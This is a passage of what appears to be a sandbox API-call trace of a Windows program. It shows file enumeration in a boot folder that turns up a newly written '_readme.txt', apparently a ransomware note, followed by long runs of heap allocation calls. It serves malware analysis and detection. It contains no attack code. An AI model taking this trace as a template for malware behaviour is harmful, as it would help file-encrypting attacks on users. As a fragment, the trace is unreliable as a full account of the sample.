lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.743] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.743] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.743] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.743] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.743] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.743] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.750] HeapFree (in: 